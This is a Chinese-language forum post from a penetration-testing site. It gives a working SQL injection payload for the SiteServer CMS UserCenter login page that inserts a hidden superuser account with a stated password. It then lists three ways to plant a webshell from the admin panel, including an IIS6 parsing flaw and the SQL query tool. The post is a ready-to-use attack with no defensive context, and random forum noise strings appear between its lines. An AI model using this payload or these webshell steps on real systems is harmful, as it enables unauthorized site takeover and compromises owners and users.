中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
" I, o- [5 s/ W* o4 a# u# j" W
stieserver官网:
www.siteserver.cn
) I& P. s. h1 K$ x, k
EXP:
& U! M7 j7 W& m& ^' U- H% g3 r7 g
直接访问UserCenter/login.aspx
0 }# X, L% ]6 d5 ]# ]) m$ p4 c
用户名处输入:
% F8 @- v: n# l$ o' ]& u. M
- d5 y/ l! j4 Z3 I+ `3 O
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
4 X' d$ X$ F. d- ^! M
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
5 G8 H) T1 j) c H; D& y) B
之后再访问后台SiteServer/login.aspx用插入的用户登陆
[/ d/ y( K$ N! j+ L
后台拿webshell的三种方法:
9 d: c+ L/ }7 Y4 u8 ]) t0 H9 P5 M
一、
! E* z4 O1 b$ i" q' T3 R* M, ~
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
3 a: O2 g% K7 a# ]: o' A
二、
) h' w3 Y* P+ q( [- N8 s6 e0 Q9 ]3 ^. g
成员权限-》添加用户-》用户名为:1.asp
* Y7 S$ Q4 r7 F4 {3 y
http://127.0.0.1/usercenter/
9 w% {% x; o' c$ U2 @ @% g
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
. a, b5 G1 s% A3 _* H
(ps:后台添加用户时不会验证是否含有非法字符)
, L3 L: ?0 x% D1 x
三、
. ?4 J# S7 H6 y; g" h4 I
系统工具-》实用工具-》机器参数查看
1 @: t# D8 ]0 L, k+ T
可以看到数据库类型、名称,WEB路径
# y4 O0 q8 d3 A! q
系统工具-》数据库工具-》SQL语句查询
$ h1 |) S/ g! E% x- |' _# Y
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2